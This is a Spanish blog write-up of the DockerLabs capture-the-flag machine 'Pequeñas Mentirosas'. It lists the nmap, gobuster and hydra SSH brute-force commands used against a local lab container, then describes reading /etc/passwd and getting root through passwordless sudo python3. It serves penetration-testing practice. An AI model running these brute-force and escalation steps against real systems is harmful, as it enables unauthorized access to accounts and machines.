Ir al contenido

Pequeñas Mentirosas

En este artículo explico cómo resolví el CTF de la máquina virtual Pequeñas Mentirosas, creada por beafn28. A continuación, detallo paso a paso las herramientas y técnicas utilizadas para identificar y explotar las vulnerabilidades de la máquina.

  • Nombre: Pequeñas-Mentirosas
  • Autor: beafn28
  • Nivel de Dificultad: Fácil
  • Fecha de creación: 26/09/2024
  1. Descargamos la máquina desde DockerLabs.

  2. Descomprimimos el archivo .zip:

    Ventana de terminal
    unzip Pequenas-Mentirosas.zip
  3. Ejecutamos el script de despliegue:

    Ventana de terminal
    sudo bash auto_deplo.sh Pequenas-Mentirosas.tar

Al iniciar la máquina, se muestra directamente su dirección IP, por lo que no es necesario realizar un escaneo ARP.

IP image

Creamos una estructura de carpetas para organizar el entorno:

Ventana de terminal
mkdir Pequenas-Mentirosas
cd Pequenas-Mentirosas
mkt # Crea: content, exploits, nmap, scripts

Realizamos un escaneo completo:

Ventana de terminal
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Extraemos los puertos abiertos:

Ventana de terminal
extractPorts allPorts

Puertos abiertos

Analizamos los puertos detectados (22 y 80):

Ventana de terminal
nmap -sCV -p22,80 172.17.0.2 -oN targeted

Servicios

Enumeramos directorios visibles en el servicio HTTP:

Ventana de terminal
gobuster dir -u http://172.17.0.2/ \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt \
-x php,html,txt,js -t 200

Resultado Gobuster

Solo se detectó el archivo index.php, el cual contiene una pista:

index

Con esta pista, intentamos un ataque de fuerza bruta con hydra para obtener la contraseña del usuario a:

Ventana de terminal
hydra -l a -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -t 4

hydra

Una vez encontrada la contraseña, accedemos vía SSH:

ssh

Explorando el sistema, no encontramos vectores claros de escalada. Como parte de la enumeración, revisamos el archivo /etc/passwd:

passwd

Identificamos un segundo usuario: spencer. Repetimos el ataque de fuerza bruta:

Ventana de terminal
hydra -l spencer -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -t 4

El ataque tiene éxito:

hydra2

Iniciamos sesión con el nuevo usuario:

spencer

Ejecutamos el siguiente comando para revisar posibles permisos de escalada:

Ventana de terminal
sudo -l

Nos encontramos con que se puede ejecutar python3 como administrador sin necesidad de contraseña:

sudo -l info

Utilizamos esta capacidad para obtener acceso como root:

Root access

La máquina Pequeñas Mentirosas ofrece una ruta sencilla de explotación basada en fuerza bruta y uso adecuado de herramientas como nmap, gobuster, hydra y sudo. Sirve como una excelente práctica para técnicas de reconocimiento, enumeración y escalada de privilegios en entornos controlados.